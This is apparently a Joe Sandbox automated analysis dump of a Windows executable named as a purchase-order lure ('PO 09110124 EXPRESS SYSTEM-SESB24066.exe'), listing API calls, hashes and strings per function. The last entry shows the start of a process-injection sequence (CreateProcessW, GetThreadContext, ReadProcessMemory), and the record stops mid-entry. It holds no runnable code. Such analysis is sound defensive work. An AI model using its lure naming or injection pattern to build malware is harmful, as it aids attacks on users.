                        • Opcode ID: 18731f0f7f4a7ef00792dbba070ca72f9465af7f58c3a0cb982353a69a0339a5
                        • Instruction ID: 64946ee38a0febbc4e924336825be209e02c2486609d4cab893060ed2e2b1227
                        • Opcode Fuzzy Hash: 18731f0f7f4a7ef00792dbba070ca72f9465af7f58c3a0cb982353a69a0339a5
                        • Instruction Fuzzy Hash: 51515CB1D1421CAFDB149F68CC81AAEBBB9EF08340F1000AEB61DE3241D7715E908F29
                        APIs
                        • _memset.LIBCMT ref: 00323CF1
                        • GetOpenFileNameW.COMDLG32(?,?,00000001,003722E8), ref: 00323D35
                          • Part of subcall function 002B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002B31DA
                          • Part of subcall function 002B3A67: SHGetMalloc.SHELL32(1<+), ref: 002B3A7D
                          • Part of subcall function 002B3A67: SHGetDesktopFolder.SHELL32(?), ref: 002B3A8F
                          • Part of subcall function 002B3A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 002B3AD2
                          • Part of subcall function 002B3B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,003722E8,?), ref: 002B3B65
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                         • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen_memset
                        • String ID: X
                        • API String ID: 3714316930-3081909835
                        • Opcode ID: 90968ef0ba4f00b5d83f665ae83458e4da74da79b8eb4cc23d74f9da7043a5fd
                        • Instruction ID: b7caeafac1701b48a7ba1a0dfa8421b4a3f76692e0a27dbea23fd422aa0684c5
                        • Opcode Fuzzy Hash: 90968ef0ba4f00b5d83f665ae83458e4da74da79b8eb4cc23d74f9da7043a5fd
                        • Instruction Fuzzy Hash: DF11A3B1A20298ABCF06DFD8D8056DEBBFDAF45704F14800AE401BB345DBB45A598FA1
                        APIs
                        • GetTempPathW.KERNEL32(00000104,?), ref: 002FD01E
                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 002FD035
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                         • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Temp$FileNamePath
                        • String ID: aut
                        • API String ID: 3285503233-3010740371
                        • Opcode ID: ee7f4368eb6b7bbc7eab6e0ccb42d02fac5a862de5f43bf70abe1a29ad5c2ab6
                        • Instruction ID: ecad72836d97369f5ac845df4c39cf0ad5b50a7d69175d41c90cc07457b7a608
                        • Opcode Fuzzy Hash: ee7f4368eb6b7bbc7eab6e0ccb42d02fac5a862de5f43bf70abe1a29ad5c2ab6
                        • Instruction Fuzzy Hash: 17D05EB154030EBBDB11ABA0ED4EF9A777CA700704F104190B614D10D1D3B0D6558BA0
                        APIs
                        • _memset.LIBCMT ref: 002B35BE
                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 002B3667
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                         • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: IconNotifyShell__memset
                        • String ID:
                        • API String ID: 928536360-0
                        • Opcode ID: f79faa0a16359bd78997461877aa98da427d7becbcf6164f9752b3a125e7aee6
                        • Instruction ID: f05bf0dd7f491b60bab9b091bf11d55860b6fb2d0c5d50a6faae9f77ce78c43c
                        • Opcode Fuzzy Hash: f79faa0a16359bd78997461877aa98da427d7becbcf6164f9752b3a125e7aee6
                        • Instruction Fuzzy Hash: 1A316DB15143019FC732DF29D8856D7BBE8FB49348F00092EF69E87240E771AA98CB56
                        APIs
                        • __FF_MSGBANNER.LIBCMT ref: 002D4603
                          • Part of subcall function 002D8E52: __NMSG_WRITE.LIBCMT ref: 002D8E79
                          • Part of subcall function 002D8E52: __NMSG_WRITE.LIBCMT ref: 002D8E83
                        • __NMSG_WRITE.LIBCMT ref: 002D460A
                          • Part of subcall function 002D8EB2: GetModuleFileNameW.KERNEL32(00000000,00370312,00000104,?,00000001,002D0127), ref: 002D8F44
                          • Part of subcall function 002D8EB2: ___crtMessageBoxW.LIBCMT ref: 002D8FF2
                          • Part of subcall function 002D1D65: ___crtCorExitProcess.LIBCMT ref: 002D1D6B
                          • Part of subcall function 002D1D65: ExitProcess.KERNEL32 ref: 002D1D74
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        • RtlAllocateHeap.NTDLL(01670000,00000000,00000001,?,?,?,?,002D0127,?,002B125D,00000058,?,?), ref: 002D462F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                         • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                        • String ID:
                        • API String ID: 1372826849-0
                        • Opcode ID: dfe2c97285e9f42870b6cb35d3b02c1450375e75521f4b2280db4ff43ad84e7b
                        • Instruction ID: 5fa72b227662f5c03e0f1bc1bbcf1d272779162fdf05e5e9e7416ac0e5a9701b
                        • Opcode Fuzzy Hash: dfe2c97285e9f42870b6cb35d3b02c1450375e75521f4b2280db4ff43ad84e7b
                        • Instruction Fuzzy Hash: 99019631631302ABE6253F34AC41A2A734CAB83761F110527FA06D63D1DFF0DC608AA4
                        APIs
                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,002FCC71,?,?,?,?,?,00000004), ref: 002FCFE1
                        • SetFileTime.KERNEL32(00000000,?,00000000,?,?,002FCC71,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 002FCFF7
                        • CloseHandle.KERNEL32(00000000,?,002FCC71,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002FCFFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                         • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: File$CloseCreateHandleTime
                        • String ID:
                        • API String ID: 3397143404-0
                        • Opcode ID: b8cd004694d437834853e366c5f27d9d8aa05ad94ad21af1441952edc6fb94c2
                        • Instruction ID: 82e180bdb0c32f07652031f86d6b4805f6a844f8e05246263b37fc681f7b50dc
                        • Opcode Fuzzy Hash: b8cd004694d437834853e366c5f27d9d8aa05ad94ad21af1441952edc6fb94c2
                        • Instruction Fuzzy Hash: E5E08632540214B7D7321F54BC4AFCA7B1DAB05B70F104210FB15690E087B165219798
                        APIs
                        • _free.LIBCMT ref: 002FC45E
                          • Part of subcall function 002D28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,002D8715,00000000,002D88A3,002D4673,?), ref: 002D28DE
                          • Part of subcall function 002D28CA: GetLastError.KERNEL32(00000000,?,002D8715,00000000,002D88A3,002D4673,?), ref: 002D28F0
                        • _free.LIBCMT ref: 002FC46F
                        • _free.LIBCMT ref: 002FC481
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                         • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 6aa3b1e5da2832baa3565b775b747617bd0a6026d08cf9f5b5c0dfc9a3fccd7e
                        • Instruction ID: 74c25dc002bb5e7702bc9565afd1515071080efa7804318131c5cb5df2512037
                        • Opcode Fuzzy Hash: 6aa3b1e5da2832baa3565b775b747617bd0a6026d08cf9f5b5c0dfc9a3fccd7e
                        • Instruction Fuzzy Hash: 90E0C2A162170AC2CA20AD786940FB393CC2F04390B24187EF549D3282CF14EC60A838
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                         • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID: CALL
                        • API String ID: 0-4196123274
                        • Opcode ID: 6114356ccb23aad45ef5b47eb280c77f5e1fc535881091efe61b86a3938151b3
                        • Instruction ID: 396452160b8a0fe9ece45b8aa03b3e50d9277b9f5ba23c0f9c8ae2a16fe9b28f
                        • Opcode Fuzzy Hash: 6114356ccb23aad45ef5b47eb280c77f5e1fc535881091efe61b86a3938151b3
                        • Instruction Fuzzy Hash: 6E227A70528241CFD728DF14C490F6AB7E1BF85344F258A6DE99A8B262D771ECA4CF42
                        APIs
                          • Part of subcall function 002B16F2: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,002B14EB), ref: 002B1751
                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 002B159B
                        • CoInitialize.OLE32(00000000), ref: 002B1612
                        • CloseHandle.KERNEL32(00000000), ref: 003258F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                         • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Handle$CloseInitializeMessageRegisterWindow
                        • String ID:
                        • API String ID: 3815369404-0
                        • Opcode ID: 6a61995500165b5ce425c2471b414b5234df902d8d256cb779672f51bab38ff6
                        • Instruction ID: 10338c738dcea9f5c05ad6d344a40967f15eb8eb524dcea131762dd6ba6a444f
                        • Opcode Fuzzy Hash: 6a61995500165b5ce425c2471b414b5234df902d8d256cb779672f51bab38ff6
                        • Instruction Fuzzy Hash: A971DBBA9212408AC33BDF6FA896494BBFCFB49394F94816ED40E87362DB304494DF51
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                         • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: EA06
                        • API String ID: 4104443479-3962188686
                        • Opcode ID: f82ac2b28cd6efcb91a43784ae6c475672f4c48e20bbd91c788d7eda75af4010
                        • Instruction ID: cc88de8b6ed9b413005c11ecbbe2f0aef974b42702bd0b66cb59828bc65cab82
                        • Opcode Fuzzy Hash: f82ac2b28cd6efcb91a43784ae6c475672f4c48e20bbd91c788d7eda75af4010
                        • Instruction Fuzzy Hash: AC418E31E3415497CB15BF5888D17FE7F628B15380F184965EA86EB283C6319EE48BA1
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: "7
                        • API String ID: 4104443479-4215175091
                        • Opcode ID: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                        • Instruction ID: 850cc5e378fb35ccb6ac5f75840855ad7c348e96afab6d4e94dc8912df711eaa
                        • Opcode Fuzzy Hash: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                        • Instruction Fuzzy Hash: 0001D132210225ABCB24DF2DC891DBBB7A9EFC5354714803EE90ACB205D631E916CB90
                        Strings
                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 003234AA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                        • API String ID: 1029625771-2684727018
                        • Opcode ID: 694386edb7c82be5ef7a6d06f1ea4bd23d8600ed669c008c6c315348092f47a1
                        • Instruction ID: aef323a91f5e47ddc3ecdf957a350f449cb14022ffec9d575ae10b872a94367f
                        • Opcode Fuzzy Hash: 694386edb7c82be5ef7a6d06f1ea4bd23d8600ed669c008c6c315348092f47a1
                        • Instruction Fuzzy Hash: 62F0627191421DAE8F12FFB4D8918FFB7B8AE10340B10C567E82692182EB74DB19DF21
                        APIs
                        • _memmove.LIBCMT ref: 002D367B
                        • __flush.LIBCMT ref: 002D369B
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __flush__getptd_noexit_memmove
                        • String ID:
                        • API String ID: 3662107617-0
                        • Opcode ID: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                        • Instruction ID: c4d719e126532848663f8e3b707fdc55f5b434cd555c7da8cb380b4aa090155c
                        • Opcode Fuzzy Hash: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                        • Instruction Fuzzy Hash: 7D41A5B5B20706ABDF18CF69C4905AEB7A9AB44360B24853FE855C7340DB70DF608B95
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                        • Instruction ID: b3ce61c346e521b5b3dd53a0ba17906ae7b1be202227be3ea6180b3a17cd02b1
                        • Opcode Fuzzy Hash: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                        • Instruction Fuzzy Hash: 4E31B8B1620507AFC715DF29C8D1E69F7A8FF48350755822AE419CB291DFB0E874CB90
                        APIs
                        • IsThemeActive.UXTHEME ref: 002B36E6
                          • Part of subcall function 002D2025: __lock.LIBCMT ref: 002D202B
                          • Part of subcall function 002B32DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002B32F6
                          • Part of subcall function 002B32DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002B330B
                          • Part of subcall function 002B374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 002B376D
                          • Part of subcall function 002B374E: IsDebuggerPresent.KERNEL32(?,?), ref: 002B377F
                          • Part of subcall function 002B374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe,00000104,?,00371120,C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe,00371124,?,?), ref: 002B37EE
                          • Part of subcall function 002B374E: SetCurrentDirectoryW.KERNEL32(?), ref: 002B3860
                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002B3726
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                        • String ID:
                        • API String ID: 924797094-0
                        • Opcode ID: b1bad8aa1b8451ae9e8d3cd95ac1ecbf6ee6a6ffc8c892de841c9390615af995
                        • Instruction ID: cc6977312dc9e53fc45ec0f0909e7d5f3b264bd39b6a94dd75c35603e62ce342
                        • Opcode Fuzzy Hash: b1bad8aa1b8451ae9e8d3cd95ac1ecbf6ee6a6ffc8c892de841c9390615af995
                        • Instruction Fuzzy Hash: C3115C729283419BC321EF29EC4595BBBE8FB94750F00461EF488872A1DB709998CF92
                        APIs
                        • ___lock_fhandle.LIBCMT ref: 002DF7D9
                        • __close_nolock.LIBCMT ref: 002DF7F2
                          • Part of subcall function 002D886A: __getptd_noexit.LIBCMT ref: 002D886A
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                        • String ID:
                        • API String ID: 1046115767-0
                        • Opcode ID: 79b5dcd5d92fc92d0d6d43ef2cc7e76f5ffd7db91faca8c5d51baeda1478c668
                        • Instruction ID: 1c77a6449224dcda6cc73331a186f263b73f60a16a58b51a8e7a34f3a45b064e
                        • Opcode Fuzzy Hash: 79b5dcd5d92fc92d0d6d43ef2cc7e76f5ffd7db91faca8c5d51baeda1478c668
                        • Instruction Fuzzy Hash: DD1125328356148ED3527F64D94234976505F42330F664362E426DF3E3CBB45D60EFAA
                        APIs
                          • Part of subcall function 002D45EC: __FF_MSGBANNER.LIBCMT ref: 002D4603
                          • Part of subcall function 002D45EC: __NMSG_WRITE.LIBCMT ref: 002D460A
                          • Part of subcall function 002D45EC: RtlAllocateHeap.NTDLL(01670000,00000000,00000001,?,?,?,?,002D0127,?,002B125D,00000058,?,?), ref: 002D462F
                        • std::exception::exception.LIBCMT ref: 002D013E
                        • __CxxThrowException@8.LIBCMT ref: 002D0153
                          • Part of subcall function 002D7495: RaiseException.KERNEL32(?,?,002B125D,00366598,?,?,?,002D0158,002B125D,00366598,?,00000001), ref: 002D74E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                        • String ID:
                        • API String ID: 3902256705-0
                        • Opcode ID: 31086af4028b6ee8b280cfad77689e1056ba706a5255ccb4ee2a15363f56fc72
                        • Instruction ID: 435a2e888821942bc321c0b906d204f8b8e5a6b41dd13b709c57288bafd6b77f
                        • Opcode Fuzzy Hash: 31086af4028b6ee8b280cfad77689e1056ba706a5255ccb4ee2a15363f56fc72
                        • Instruction Fuzzy Hash: 14F0C83911420EA6C716BFA8ED42ADE77ECAF04350F104457F909D2391DBB0DEB09AA5
                        APIs
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        • __lock_file.LIBCMT ref: 002D42B9
                          • Part of subcall function 002D5A9F: __lock.LIBCMT ref: 002D5AC2
                        • __fclose_nolock.LIBCMT ref: 002D42C4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                        • String ID:
                        • API String ID: 2800547568-0
                        • Opcode ID: a882d12dff9564306fec9ce07294681dfab9aa205291db3d32d9074eb969fd01
                        • Instruction ID: c4846382ebe1506ba206997dd59e3b74b9e6225f1c4afc40472d90781c6c8737
                        • Opcode Fuzzy Hash: a882d12dff9564306fec9ce07294681dfab9aa205291db3d32d9074eb969fd01
                        • Instruction Fuzzy Hash: DBF06D318256159BE711BB75880A75E67D06F40324F61820BB864AB3C5DBBC9E219F51
                        APIs
                        • CreateProcessW.KERNEL32(?,00000000), ref: 03BC1A5B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03BC1AF1
                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 03BC1B13
                        Memory Dump Source
